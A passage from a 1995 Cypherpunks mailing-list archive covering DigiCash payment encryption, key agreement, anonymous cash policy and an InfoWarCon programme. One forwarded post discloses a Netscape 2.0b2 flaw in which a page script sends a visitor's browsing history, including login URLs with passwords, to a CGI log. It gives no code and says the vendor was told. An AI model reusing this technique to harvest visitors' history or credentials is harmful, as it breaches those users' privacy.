clear* in the Digicash payment >protocol. Thus all those items can be correlated to the payee's identity: >a complete loss of privacy for the shop. > >There's no need to send that payment info in the clear -- why not encrypt? DigiCash agrees that it is desirable to encrypt the payment request. The problem is how? You can't use the payor's public key, since the payor is anonymous to the payee. There are other, high overhead, protocols that might be used, but after taking MIM into account, securing the payment request from within Ecash while retaining acceptable latency is much harder to acomplish than one might think. The best solution at this time seems to be to use the already existing https connection to transmit the payment request. The next version of Ecash will offer this feature as an option to the user. --Mark Twain Bank Ecash Support Ecash. The secure Internet payment system that protects your privacy. From jfricker at vertexgrp.com Fri Dec 8 10:41:02 1995 From: jfricker at vertexgrp.com (John Fricker) Date: Fri, 8 Dec 95 10:41:02 PST Subject: Anyone know of a white paper on security? Message-ID: <199512081938.LAA01395@vertex.vertexgroup.com> The question I'm seeking to answer is : What criteria should be used to determine whether a scripting language such as Java, LiveScript, etc. is secure? There are obvious issues such as access to the file system but has anyone thought this all the way through and codified a white paper? john. From jwhiting at igc.apc.org Fri Dec 8 10:46:55 1995 From: jwhiting at igc.apc.org (Jerry Whiting) Date: Fri, 8 Dec 95 10:46:55 PST Subject: The Elevator Problem Message-ID: <199512081847.KAA25829@igc2.igc.apc.org> A group of us have been wrestling with a problem and I'd like to ask for some outside help. We've come to call it the Elevator Problem. Alice and Bob want to establish a secret in from of Eve. In other words, they want to agree on a secret key in an elevator full of Eve's. We don't want the protocol to step on any existing patents (DH, HM, etc.). If the protocol takes numerous steps, that's OK because ultimately we'd like Alice's machine to contact Bob's, who could respond, and back and forth as often as needed. We have also talked about a less than perfect solution IF we can establish mathmatically what the confidence level and risk factor are. Alice and Bob might agree that the value of the secret is such that they can live with a 1 in n probability that Eve too has the secret. Shamir's 3 step seems close but I'm afraid we've been doing the blackboard talks so long that we're missing the solution. IF THERE EVEN IS ONE. thanks in advance, Jerry Whiting jwhiting at azalea.com From andrew_loewenstern at il.us.swissbank.com Thu Dec 7 19:00:50 1995 From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern) Date: Fri, 8 Dec 1995 11:00:50 +0800 Subject: DigiCash releases protocol specs! Message-ID: <9512012324.AA01808@ch1d157nwk> > By popular request, DigiCash is releasing the protocol specs. Three cheers to DigiCash, Mark Twain, and Lucky! andrew From cman at communities.com Fri Dec 8 11:04:24 1995 From: cman at communities.com (Douglas Barnes) Date: Fri, 8 Dec 95 11:04:24 PST Subject: More FUD from First Virtual Message-ID: [Remainder of Nat's largely inaccurate rant deleted] > But basically, what your argument comes down to is that in >the event of a catastrophe, users can be told they have to sacrifice >their anonymity if they want to keep their cash. As I have said all >along, the basic tradeoff is between anonymity and risk limitation in >the event of disaster recovery. NB's errors and distortions are numerous, but for the sake of brevity and topicality I've chosen this particular misconstruction of what I've written as an exemplar. In my proposed approach, users don't sacrifice one iota of privacy when redeeming expired cash. When the user reveals blinding factors on unspent cash, the bank gives the user new (blinded) cash in exchange. No payer-payee relationship is revealed. This is the same wrong argument you've made before. Try reading the (very short) note; this point is made explicitly. I have no clue what Digicash is actually doing in this regard, but one of their engineers alluded to something along these lines at Crypto. It is this systematic distortion of truth by at least two representatives of First Virtual that has lead to this (highly intermittent) "vendetta". I try not to feed the energy creatures, but this particular creature and his minions are literally running around the country, spewing their lies whenever they get the chance. When they slam cryptography in the banking community, you can be assured they don't mention their charity work for Phil, or how they really want to see anonymous systems some day. From andrewk at dexotek.ca Fri Dec 8 11:25:55 1995 From: andrewk at dexotek.ca (Andrew Kuchling) Date: Fri, 8 Dec 95 11:25:55 PST Subject: Python Cryptography Toolkit v1.0.0 In-Reply-To: <199512080747.CAA06243@opine.cs.umass.edu> Message-ID: <9512081925.AA17370@toad.com> Futplex wrote: > (1) If you don't mind announcing that you've exported the software from > Canada to the Netherlands, why not just put it up for ftp at a Canadian > site ? Simply because I don't have anywhere to put it. This e-mail account is at my workplace, and my employer doesn't run an anonymous FTP site. I also don't have an account with a local ISP, just because I haven't bothered to get one yet. Once I do, I'll certainly make the code available there. > (2) Acronym overload: try to avoid calling your toolkit "PCT", since M$ > already has some security protocol called PCT.... Yeah, I know; my code has been around for about 6 months, and I only found out about MS's protocol a few weeks ago. Hmmm... Python Cryptography _Package_? Kit? Collection? Stuff? Andrew Kuchling andrewk at cst.ca From adam at homeport.org Fri Dec 8 11:32:20 1995 From: adam at homeport.org (Adam Shostack) Date: Fri, 8 Dec 95 11:32:20 PST Subject: Anyone know of a white paper on security? In-Reply-To: <199512081938.LAA01395@vertex.vertexgroup.com> Message-ID: <199512081937.OAA03591@homeport.org> John Fricker wrote: | The question I'm seeking to answer is : | | What criteria should be used to determine whether a scripting | language such as Java, LiveScript, etc. is secure? | | There are obvious issues such as access to the file system but has | anyone thought this all the way through and codified a white paper? First you need to decide what you mean by secure. Then you need to prove your code is correct, and conforms to the spec. Any high school student could do it. :) -- "It is seldom that liberty of any kind is lost all at once." -Hume From frantz at netcom.com Fri Dec 8 11:50:12 1995 From: frantz at netcom.com (Bill Frantz) Date: Fri, 8 Dec 95 11:50:12 PST Subject: Still more on the Digicash protocol Message-ID: <199512081948.LAA16066@netcom15.netcom.com> At 12:26 12/8/95 -0600, Mark Twain Ecash Support wrote: >DigiCash agrees that it is desirable to encrypt the payment request. The >problem is how? You can't use the payor's public key, since the payor is >anonymous to the payee. There are other, high overhead, protocols that might >be used, but after taking MIM into account, securing the payment request >from within Ecash while retaining acceptable latency is much harder to >acomplish than one might think. Wouldn't a Diffie-Hellman key exchange work here? Or is that too much overhead? ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. frantz at netcom.com Los Gatos, CA 95032, USA From jcooper at virtu.sar.usf.edu Fri Dec 8 11:59:19 1995 From: jcooper at virtu.sar.usf.edu (Jon Cooper) Date: Fri, 8 Dec 95 11:59:19 PST Subject: More FUD from First Virtual In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > >I *am* skeptical about the extent to which anonymous cash *can* succeed, > > What can stop it? What should stop it? The US government can stop it. It is irrelevant what *should* stop it, but it's extremely useful to note that the US government's political climate of paranoia and FUD in general will certainly not allow truly anonymous cash systems inside of our country in the forseeable future. - -jon -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMiXeEjEaxpIF0UlAQGHggH7Bn8hrxKHsUHq0uqf7WXBxEVn4hMVofOu HpmdmGZei4hvEwDnJ8Z8oN/BoVS5Sx4K59FItbofnRZvTn4SZAS3ug== =rskN -----END PGP SIGNATURE----- -------------------------------------------------------- Jon Cooper squeamish ossifrage From wfgodot at iquest.com Fri Dec 8 12:21:20 1995 From: wfgodot at iquest.com (Michael Pierson) Date: Fri, 8 Dec 95 12:21:20 PST Subject: "Information Technology for Control of Money Laundering" Message-ID: <199512082022.OAA18480@vespucci.iquest.com> -----BEGIN PGP SIGNED MESSAGE----- I've just finished perusing the Office of Technology Assessment's "Information Technology for Control of Money Laundering" . It's an informative and fascinating document for anyone interested in the issues of money laundering and its implications for the future of digital currency, as well as its increasing role as an important rationale in promoting government surveillance agendas. Broken into seven chapters, this document provides a valuable overview of the subject from the government's perspective. 1. "Electronic Money Laundering" covers the ABCs of money laundering and its connection to drug trafficking, terrorism and the global underground economy. It traces the relevant statutory history from the Bank Secrecy Act of 1970 onward. 2. "Mechanisms of Wire Transfer" examines the basics of wire transfers and the details of the FEDWIRE, CHIPS and SWIFT systems. 3. "Money Laundering and Law Enforcement" examines the laws and regulations involved and the various Federal and State Agency roles and responsibilities. 4. "Technologies for Detecting Money Laundering" is particularly interesting. It discusses the FinCEN Artificial Intelligence System (FAIS), and AI approaches including Expert Systems, Link Analysis, Neural Network techniques, Machine Learning and various statistical modeling methods. 5. "Privacy and Confidentiality" covers different investigative prerogatives, the legal history and case law of privacy jurisprudence, aspects of individual and corporate confidentiality, etc... 6. "International Issues" explores off-shore banking, international law enforcement efforts like the Financial Action Task Force (FATF) and the subject of bilateral and multilateral cooperative agreements and conventions. 7. "Conclusions and Policy Options" discusses money laundering and the world economy, and various policy directions for the future as well as the type of monitoring regimes that might be established. It pays particular attention to the subject of the future impact of digital money, observing: "As alternative modes of electronic payment, e.g., "digital cash", develop, whatever precedents are set for access to wire transfers might also be applied to these alternatives. If not, digital cash, or "the electronic purse" may provide another channel for dirty money, so that monitoring of wire transfers will no longer be effective." I noticed that major network news reports on the "growing threat" of money laundering were particularly evident in close temporal conjunction to the wide public coverage of the latest FBI CALEA revelations. Just coincidence, I guess... Bonus: While your there you might want to (if you haven't yet) pick up another OTA document entitled "Electronic Surveillance in a Digital Age" which provides some useful additional government position tracking data on the legal and technical aspects of CALEA. It's available in both text and PDF formats. - -Michael -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMMidCtGJlWF+GPx9AQGROQP+KtumqozBLlFgupOCcoKRIk6udFz0jRt4 Vt1y1noiV0tJCE2XQdEGiU7KhRHDC8QX+Zi1wxVqnlhxNI8hF5g4nDGf+DHyw54r KsXce7fJvPVZ3dn69dYIQ70gpa6BfAvsFXGAP9gnL3RxnxxYGfBknp2xdz0SiBQv t0bnWwIab68= =bWRK -----END PGP SIGNATURE----- From frissell at panix.com Fri Dec 8 12:33:26 1995 From: frissell at panix.com (Duncan Frissell) Date: Fri, 8 Dec 95 12:33:26 PST Subject: More FUD from First Virtual Message-ID: <2.2b8.32.19951208203419.006933d4@panix.com> At 02:52 PM 12/8/95 -0500, Jon Cooper wrote: > The US government can stop it. It is irrelevant what *should* stop >it, but it's extremely useful to note that the US government's political >climate of paranoia and FUD in general will certainly not allow truly >anonymous cash systems inside of our country in the forseeable future. But who's going to ask? If an anonymous payment system springs up outside the US, we can use it as a store of value if nothing else or for shopping overseas. Domestically, we can convert non-anonymous payment systems into semi-anonymous ones. What counts is difficulty of transaction and market demand not legal structure. Thus, about five minutes after the "temporary VISA card" travelers check substitutes are issued, I can start selling them for (discounted) cash to all comers. Likewise Ecash laundry servers letting anonymous people use non-anonymous Ecash. It remains to be seen how much customers value anonymity. There should be a niche market in any case. DCF "Every man his own ISP." From bkuhn at scientech.com Fri Dec 8 12:38:23 1995 From: bkuhn at scientech.com (Bill Kuhn) Date: Fri, 8 Dec 95 12:38:23 PST Subject: BoS: Netscape 2.0b2 allows for invasion of privacy (fwd) Message-ID: <199512082033.PAA18711@rex.scientech.com> Talking of Netscape - this posting prompted me to forward it given the security and privacy implications inherent in the problem. Cheers Graeme ------- Start of forwarded message ------- >From: Scott Weston >Subject: Netscape 2.0b2 allows for invasion of privacy >Newsgroups: aus.net.announce,comp.privacy >Date: Fri, 01 Dec 1995 11:09:06 +1100 Hi 'Net Dwellers, First off - I've posted this before (however not to this group) and only got a response from the Netscape Corp. They were glad I found the problem and said that they would fix it, however I feel that people should know about it. Also I would like people to help me spread this document around, i.e. if you know of a newsgroup (or people) that would find this interesting then please re-postit. On with the problem... I've recently got hold of the latest netscape, and was (at first) very excited about the new "LiveScripts" that it supports. If people don't yet know - these "LiveScripts" allow you to put small programs into your web page that is then executed by the Netscape client. There is no DIRECT way for these programs to send information back to the owner of the web page, however I was able to do it in a not-so-direct way. The "LiveScript" that I wrote extracts ALL the history of the current netscape window. By history I mean ALL the pages that you have visited to get to my page, it then generates a string of these and forces the Netscape client to load a URL that is a CGI script with the QUERY_STRING set to the users History. The CGI script then adds this information to a log file. Now if this hasn't quite CLICKED yet lets do a little example. Johnny Mnemonic starts up his newly acquired version of Netscape2.0b2 to start his daily "surf" session. First he decides to check his CD-NOW purchase and uses the handy Auto-Login URL. Then he decides to go to Lycos and do a search. In his search he find my page, which he decides to visit. Suddenly he is transported, not to my main page but to one of my CGI scripts, which in turn happens to have ALL the URL's he just been to in it. This means that in my log will be: - the URL to use to get into CD-NOW as Johnny Mnemonic, including username and password. - The exact search params he used on Lycos (i.e. exactly what he searched for) - plus any other places he happened to visit. I do this in a way that the user will KNOW that it has happened and will _hopefully_ email Netscape and tell them they are NOT impressed. But it would be EASY for me to change the CGI script so that the user is unaware that it has actually happened, unless they closely examine their URL history (in fact they'll probably just think its a netscape bug). If you're skeptical about this then do the test yourself. Get netscape 2.0b2 and do some normal surfing, and then go to Lycos. Do a search for: scotts car boot sale which should return the URL - http://www.tripleg.com.au/staff/scott Click on the URL and sit back an watch. First my main page will show up but a little while later you should be transported to a CGI bin script that will show you your URL history. I have tested this with both the Linux 2.0b2, and Solaris 2.0b2 versions and both have done the same thing. I would be interested in knowing if it happens for ALL versions of Netscape2.0b2. The log file does log the User Agent (i.e. the name of the platform you are using) so by simply going to the page I will know that your version of Netscape is also open to this form of attack. Currently I can find no way to configure Netscape2.0b2 to NOT run LiveScripts - and at the very least this option should be quickly added to the next version of netscape to be released. But a far better solution (IMHO) would be for netscape to pop up a window before running the LiveScript and let you know what the LiveScript wants access to, e.g. if it only wants to print out the current time then that's OK, but if it wants to read my history list and then transport me to a CGI script and add me to a logfile then maybe I would say NO. I think I've said enough.... If you've got any further questions, or want some more information just email me : scott at tripleg.com.au -- Scott. Quote from a car accident insurance claim: "I told the police that I was not injured, but on removing my hat, I found that I had a skull fracture." ------- End of forwarded message ------- From tcmay at got.net Fri Dec 8 13:00:13 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 8 Dec 95 13:00:13 PST Subject: BoS: Netscape 2.0b2 allows for invasion of privacy (fwd) Message-ID: At 8:33 PM 12/8/95, Bill Kuhn wrote: >Talking of Netscape - this posting prompted me to forward it given the >security and privacy implications inherent in the problem. > >Cheers >Graeme > >------- Start of forwarded message ------- >>From: Scott Weston >>Subject: Netscape 2.0b2 allows for invasion of privacy >>Newsgroups: aus.net.announce,comp.privacy >>Date: Fri, 01 Dec 1995 11:09:06 +1100 > >Hi 'Net Dwellers, "'Net Dwellers" or "Det Weilers"? Hmmhhh.... In any case, this has already come up a couple of times on the Cypherpunks list, and was even commented upon by Jeff Weinstein of Netscape a couple of days ago. The bug was fixed in b3. I really encourage people who are not following the list more carefully to check the back traffic before posting bug reports. Forwarding messages is often the culprit in this, as the forwarder simply assumes we may be interested, but he has himself not been following the thread. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From m5 at dev.tivoli.com Fri Dec 8 13:17:27 1995 From: m5 at dev.tivoli.com (Mike McNally) Date: Fri, 8 Dec 95 13:17:27 PST Subject: Internet Stocks In-Reply-To: <199512081645.AA18510@sunstorm.corp.cirrus.com> Message-ID: <9512082118.AA02278@alpha> Ashfaq Rasheed writes: > Can this be made a regular feature on the list? Yea, Tim, will you manage my portfolio for me? I keep getting the "buy low/sell high" rule mixed up. [ :-) for the impaired. ] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) | | stand there and flap your arms like a fish. | Tivoli Systems, Austin TX | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From tcmay at got.net Fri Dec 8 13:19:00 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 8 Dec 95 13:19:00 PST Subject: The Elevator Problem Message-ID: At 6:47 PM 12/8/95, Jerry Whiting wrote: >A group of us have been wrestling with a problem and I'd like to ask for some >outside help. We've come to call it the Elevator Problem. > >Alice and Bob want to establish a secret in from of Eve. In other words, >they want to agree on a secret key in an elevator full of Eve's. Isn't this just the "subliminal channels" scenario? Originally phrased in terms of prisoners under the watchful eyes of their jailers nevertheless establishing a private communication channel? Schneier describes this beginning on page 66 (of his 1st edition). Your scenario looks identical to this. So you should check out the papers on this in the Crypto Conference proceedings. As to whether you can implement this without using patented algorithms, I don't know. Not enough information given. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From winn at Infowar.Com Fri Dec 8 13:30:19 1995 From: winn at Infowar.Com (winn at Infowar.Com) Date: Fri, 8 Dec 95 13:30:19 PST Subject: InfoWarCon Message-ID: <199512082134.QAA23960@mailhost.IntNet.net> P L E A S E D I S T R I B U T E W I D E L Y InfoWarCon (Europe) '96 Defining the European Perspective Brussels, Belgium May 23-24 1996 Sponsored by: National Computer Security Association Winn Schwartau, President and CEO, Interpact, Inc. Robert David Steele, Chairman & CEO, OPEN SOURCE SOLUTIONS Information Warfare represents a global challenge that faces all late-industrial and information age nation states. It also represents the easiest and cheapest way for less developed nation-states and religious or political movements to anonymously and grieviously attack major nations and international corporations. Not only are the definitions of InfoWar unclear, but they span many areas and disciplines. This conference will examine the European perspectives on all three classes of Information Warfare while contributing some American lessons learned, mistakes made and successes enjoyed. Class I: Personal Privacy Class II: Industrial and Economic Spying and Warfare Class III: Global Conflict, Terrorism and the Military As at all other InfoWarCon, this special European Conference encourages active audience participation, contribution and debate. May 22, 1996 17:00 - 20:00 Pre-Registration 18:00 - 21:00 Hosted Cocktail Party with Music Most conference speakers will be in attendance. Meet Mr. Schwartau and Mr. Steele. May 23, 1995 07:00 - 08:30 Registration 07:00 - 08:30 Sponsored Continental Breakfast PLENARY SESSIONS 08:30 - 09:00 Keynote Speech Major General William Robbins Assistant Chief Of Staff, Command, Control, Communications, Computing, and Information Ministry of Defence, United Kingdom (Invited) 09:00 - 10:00 "Information Warfare: Chaos on the Electronic Superhighway" Winn Schwartau President and CEO, Interpact, Inc., USA An overview of Information Warfare from the civilian perspective by one of the world's leading experts on the subject. This will be an eye-opening presentation with time reserved for questions from the audience. Mr. Schwartau will be available throughout the conference for personal and private discussions as well as book signings. 10:00 - 11:15 Military View of Information Warfare Moderator: Captain Patrick Tyrell Assistant Director, Information Warfare Policy, Ministry of Defence, United Kingdom Panel: The German View The Russian View The Croatian View 11:15 - 11:45 Sponsored Break 11:45 - 13:00 Law Enforcement in Cyberspace: Cooperation is the Key: Panel Moderator: Winn Schwartau, Interpact, Inc. Panel: Interpol Surite FBI Netherlands How will global partners respect each other's laws and cooperate in their enforcement? Will extradition for cyber-crimes become necessary? Leading experts will walk us down the paths to success and offer lessons learned on failures and risks. 13:00 - 14:30 Lunch 13:30 - 14:00 Special Luncheon Presentation BREAKOUT SESSIONS 14:30 - 16:00 Breakout I: Threats to European Civil Prosperity Moderator: Admiral Lacoste/General Heinrich, France (Invited) Panel: Belgium Germany United Kingdom Europe is becoming as dependent upon its econo-technical infrastructure more than ever with the design and construction of the European Space Initiative. Communications systems create the basis for global commerce, transportation systems permit the distribution of goods, the financial infrastructure is a requisite component of any information based economy and the power grid glues it all together. But, the threats to their stability and integrity are many and must be dealt with on a continent that has a history of war and more recently terrorism. What are the risks? The rewards? And the solutions? Breakout II: Information Warfare: Support for Conventional War Fighting Moderator: TBD Panel: US - Gen. Jim McCarthy USAF (Ret) Russia Netherlands Conventional Wars and regional conflicts are replacing the fear of East-West conflict. Advanced Industrial and Information Age societies will supplement their armed forces with enhanced information processing capabilities. What are they and will they change the face of war? 16:00-16:30 Sponsored Break PLENARY SESSION 16:30 - 18:00 "Hackers: National Resources or Merely Cyber-Criminals?" Moderator: Mich Kabay, Ph.D. Director of Education, NCSA and Robert Steele, President, OSS, Inc. Panel: Hactic and The Digital City Experiment: Amsterdam, Netherlands (Invited) Hacker, United Kingdom CHAOS Computer Club, Germany Are hackers merely criminals operating under the guise of Internet freedom? Or are they national resources to be cultivated and who have served as an early warning system for Cyberspace? One group of American hackers have threatened to "Declare War on France" on behalf of American interests. How do we as nations deal with this? Mich Kabay and Robert Steele will debate the issue and then you will meet the hackers in person. The first Information Warriors invite your questions, comments and interaction. Learn first hand who they are, what they believe and how they function. 18:00 - 21:00 Hosted Reception 21:00 - 23:00 "Dutch Dinners" for Birds of a Feather Rallying points will be provided. May 24, 1996 07:00 - 8:30 Sponsored Continental Breakfast 08:30 - 9:00 Keynote Speech "Efforts to Maximize Information As New Age Weapon" (TBD) PLENARY SESSIONS 9:00 - 10:00 "Creating Smart Nations Through National Information Strategies: Intelligence And Security Issues" Robert David Steele, President, OSS, Inc. US Planning for the future requires new thinking and a new "triad" of defense: Open Source Intelligence, Electronic Home Defense and Information Warfare. 21st Century realities invite dozens more players whom must be monitored and controlled. Governments and the military should avail themselves of the publicly available open source information as part of their ongoing intelligence operations. Mr. Steele has suggested that nations should "draft" the civil sector by requiring 'due diligence' and very high standards of private sector communications and computing security. 10:00 - 11:15 "The Convergence of Military and Commercial Vulnerabilities" Moderator: Winn Schwartau, President and CEO, Interpact, Inc. Panel: Bob Ayers, DISA, Department of Defense, US Holland / Belgium UK France Much of military success depends upon the reliable operation of civilian and commercial systems. No longer do the government and military and private sector function in isolation. What levels of cooperation are required to assure proper defense and war fighting capability? How much of the private sector must be viewed as a national security asset - to be protected as much as is a forward deployed military unit? 11:15 - 11:45 Sponsored Break 11:45 - 13:00 Societal Impact of Information Warfare Moderator: Winn Schwartau, President and CEO, Interpact, Inc. Society is absolutely dependent upon technology; without networks and computers and communications, portions of society can collapse within days. If major systems fail, what will the reaction of a techno-reliant society be? And, what are the ethics of a military who instigates the collapse of an adversary's civilian infrastructure rather then resort to bombs and bullets? Is a techno-phobic society psychologically prepared for the consequences? 13:00 - 14:30 Lunch 13:30-14:00 Special Luncheon Presentation BREAKOUT SESSIONS 14:30 - 16:00 Breakout I: Legislation & Personal Privacy: A Global Electronic Bill of Rights? Moderator: General Pickering, Canada (Invited) Panel: Electronic Privacy International (Invited) Sweden The Vatican This panel will examine the different approaches governments take to protect the personal privacy of their citizens and what steps need to be taken to create a global consensus. How do differing privacy laws affect countries ability to do business? How will authoritarian regimes counter the perceived threat of free and open information flow? Breakout II: "Industrial Espionage: An Update" Moderator: DST, France (Invited) - (RS) Panel: Surite tells all Kroll Associates US Germany 122 Countries are actively engaged in industrial and economic espionage to the benefit of their respective states. It's a lot easier for a third world or agrarian society to steal intellectual and proprietary property than to invest time and resources develop their own. Who's involved and what are they doing? What steps need to be taken to defend such actions? 16:00 - 16:30 Sponsored Break PLENARY 16:30 - 18:00 Defining War in the Information Age "The New National Security" Brief comments by Winn Schwartau and Robert Steele - and then a lively interactive audience debate. An enemy bomb landing in any country can be easily construed as an act of war. However, in Cyberspace, anonymous acts of aggression that lead to war or replace conventional attacks are not so simple to classify. This highly charged subject will consider what war is and what it isn't: - Is an attack against a financial institution an act of war? - What about the intentional collapse of a communications infrastructure? - Is human lethality a necessary pre-requisite for war? - Do we need to redefine national security for the post Cold-War world? 18:00 - 18:10 Closing Comments 18:00 - 20:00 No-Host Reception Hotel Information: Hotel Palace rue Gineste 3 1210 Brussels Belgium +32 2 203 62 00 +32 2 203 55 55 (Fax) InfoWarCon (Europe) - 96 Registration Form: Name: ___________________________________________________________ Title: ___________________________________________________________ Org: ___________________________________________________________ Address: ___________________________________________________________ Address: ___________________________________________________________ City: ___________________________________________________________ State: _______________________________ Zip: _____________________ Country: __________________________ Email: ________________________ Phone: __________________________ Fax: _________________________ FEES: Payment made BEFORE March 1, 1996: ( ) $845.00 NCSA Members/OSS Attendees ( ) $895.00 All others ( ) $795.00 3 people from same organization ( ) $745.00 5 or more people from same organization Payment made AFTER March 1, 1996: ( ) $895.00 NCSA Members/Paid OSS Attendees ( ) $995.00 All others ( ) $845.00 3 people from same organization ( ) $795.00 5 or more people from same organization Make checks payable to NCSA, or Charge to: ( ) VISA ( ) MasterCard AMEX ( ) Number: ___________________________________________ Exp date: ___________________________ Signature: ___________________________________________ MAIL OR FAX OR EMAIL REGISTRATION TO: National Computer Security Association 10 South Courthouse Avenue Carlisle, PA 17013 Phone 717-258-1816 or FAX 717-243-8642 EMAIL: conference at ncsa.com To obtain the latest edition of this program, send EMail to: euroinfowar at ncsa.com For more information about NCSA: WWW: http://www.ncsa.com CompuServe: GO NCSA EMail: info at ncsa.com Sponsorships for various InfoWarCon (Europe) 96 events are still available. To find out how to sponsor portions: Contact Paul Gates at the NCSA: pgates at ncsa.com To reach: Winn Schwartau: Winn at Infowar.Com Robert Steele: ceo at oss.net V 1.1/12.7.95 Peace & Happy Holidays Winn Winn Schwartau - Interpact, Inc. Information Warfare and InfoSec V: 813.393.6600 / F: 813.393.6361 Winn at InfoWar.Com From EALLENSMITH at mbcl.rutgers.edu Fri Dec 8 13:34:58 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Fri, 8 Dec 95 13:34:58 PST Subject: GAK and Self-Incrimination? Message-ID: <01HYKKMGLV4Q9S3T6Q@mbcl.rutgers.edu> From: IN%"tcmay at got.net" 8-DEC-1995 13:28:32.69 Given that GAK means one never knows if the government is listening, could a person claim protection against self-incrimination as a reason to not use GAK, and get away with it? (This is different from the phone system, which may also be tapped. The analogy would be the same if the government forced one to pick a telephone it could tap over one it could not, which so far has not been the case, but which soon may be if switching systems which are not compliant with Digital Telephony Act provisions are shut down.) Consider this hypo: I send an encrypted message to a partner in crime containing plans for future crimes and descriptions of past crimes. I don't GAK the message. The government prosecutes me under the Anti-Terrorism and Child Protection Act of 1997. My defense? That GAKKing the message would be tantamount to incriminating myself, which the Fifth Amendment protects me against. ------------------- There is the problem with this argument that personal diaries have recently (Packwood) been found to not fall under the Fifth amendment. However, IA(most definitely)NAL. -Allen From cman at communities.com Fri Dec 8 13:37:32 1995 From: cman at communities.com (Douglas Barnes) Date: Fri, 8 Dec 95 13:37:32 PST Subject: NSA flying disk follow-up [Extremely Frivolous] Message-ID: I spoke with Dennis Cisco at the NSA today, and he is unwilling to sell or otherwise distribute the NSA flying disk promotional items "except at trade shows where we are promoting our technology transfer program." Since they are not planning on attending any such conferences in my area in the near future, it is unlikely I'll be able to help any of the (numerous) people who expressed an interest in obtaining one of these fine flying disks. (http://www.communities.com/foo/NSAfris.gif) If you'd care to discuss this matter with Mr. Cisco yourself, he can be reached at: (301) 688 0701. Note that this is in Maryland. Also, the (301) 688 0606 number listed on the frisbee seems to be either always busy or not answered -- I'm assuming it's the # for the NSA tech transfer office. Please let me know if any of you have better luck. From master at internexus.net Fri Dec 8 14:18:35 1995 From: master at internexus.net (Laszlo Vecsey) Date: Fri, 8 Dec 95 14:18:35 PST Subject: CP: Mailing List Subjects In-Reply-To: Message-ID: Would it be possible for the Cypherpunks mailing list remailer to parse the Subject line to include a CP: at the beginning, or some notation so that Cypherpunk messages can be easily 'filtered' out from my Inbox? Also, about Microsoft's .PWL file format. Will they be releasing the new encryption method? Or are we not supposed to feel safe that our passwords are protected in Windows95. From stewarts at ix.netcom.com Fri Dec 8 14:34:17 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Fri, 8 Dec 95 14:34:17 PST Subject: Still more on the Digicash protocol Message-ID: <199512082234.OAA02297@ix9.ix.netcom.com> At 12:26 PM 12/8/95 -0600, Mark Twain Bank Ecash Support wrote: >>There's no need to send that payment info in the clear -- why not encrypt? > >DigiCash agrees that it is desirable to encrypt the payment request. The >problem is how? You can't use the payor's public key, since the payor is >anonymous to the payee. There are other, high overhead, protocols that might >be used, but after taking MIM into account, securing the payment request >from within Ecash while retaining acceptable latency is much harder to >acomplish than one might think. Obviously if the payer is the one transmitting the message, she doesn't use her public key to encrypt; hers would be used for signature if appropriate. She should use the payee's public key, or some negotiated key like DH. It doesn't lose any privacy, because she already knows an address to send the money to, and the payee can create a public key for that address, or some other public key he makes available to payers. >The best solution at this time seems to be to use the already existing https >connection to transmit the payment request. The next version of Ecash will >offer this feature as an option to the user. I had assumed that the payment information wasn't encrypted because that's a separate problem from the basic digicash, and because if the payer wants to keep the transaction private, she probably also needs to encrypt the other side of the transaction - e.g. the request for n widget at $d/widget. https or other ssl connection, or an encrypted telnet, or encrypted email, or some other protected mechanism all would seem to be appropriate. #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From llurch at networking.stanford.edu Fri Dec 8 14:52:17 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Fri, 8 Dec 95 14:52:17 PST Subject: CP: Mailing List Subjects In-Reply-To: Message-ID: On Fri, 8 Dec 1995, Laszlo Vecsey wrote: > Would it be possible for the Cypherpunks mailing list remailer to parse the > Subject line to include a CP: at the beginning, or some notation so that > Cypherpunk messages can be easily 'filtered' out from my Inbox? Majordomo always includes a Sender: owner-cypherpunks at toad.com header. You'd know this if you used, say, Microsoft Exchange, Microsoft Mail, or some other broken mail gateway. Procmail or whatever should be able to filter mail based on this. You can also read cypherpunks courtesy of http://www.hks.net/ (no, Cyberia-L isn't there), or nntp.hks.net. Lots of people do this. I prefer to deal with receiving the list in my personal mailbox because I don't like waiting for downloads in real time. > Also, about Microsoft's .PWL file format. Will they be releasing the > new encryption method? Or are we not supposed to feel safe that our > passwords are protected in Windows95. I asked a related question of one of the networking program managers today; I think the answer is yes. I'll forward this to see if he'd like to make a public comment. -rich From hayden at krypton.mankato.msus.edu Fri Dec 8 15:16:43 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Fri, 8 Dec 95 15:16:43 PST Subject: CP: Mailing List Subjects In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 8 Dec 1995, Laszlo 